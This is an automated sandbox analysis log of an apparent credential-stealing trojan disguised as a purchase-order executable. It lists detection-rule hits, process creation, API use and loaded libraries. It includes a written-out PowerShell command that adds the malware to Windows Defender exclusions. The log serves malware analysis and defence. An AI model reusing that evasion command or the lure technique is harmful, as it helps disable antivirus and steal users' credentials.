                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_068B22B012_2_068B22B0
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_068B7F8812_2_068B7F88
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_068B7F8212_2_068B7F82
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_068B8C7612_2_068B8C76
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1761794847.0000000005F60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000000.1718033193.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLrBtUp.exeF vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename44f18827-ac02-496c-beb3-f0922f952617.exe4 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1753991456.000000000101E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename44f18827-ac02-496c-beb3-f0922f952617.exe4 vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4180312206.0000000000CF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeBinary or memory string: OriginalFilenameLrBtUp.exeF vs PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 6.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.ctsdvwT.exe.3a630e0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.ctsdvwT.exe.3a630e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.ctsdvwT.exe.3a284c0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.ctsdvwT.exe.3cc9990.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.ctsdvwT.exe.3cc9990.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.ctsdvwT.exe.3a284c0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, JwlrlmCCKvmG8rWaC9.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, TDUwymQgqk3Z3KoOJH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, TDUwymQgqk3Z3KoOJH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, TDUwymQgqk3Z3KoOJH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/9@4/1
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.logJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: \Sessions\1\BaseNamedObjects\cHxCTwTuL
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3748:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3tzu3xt.1xd.ps1Jump to behavior
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.1935883302.0000000002968000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000C.00000002.4184465405.00000000032F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeReversingLabs: Detection: 71%
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile read: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
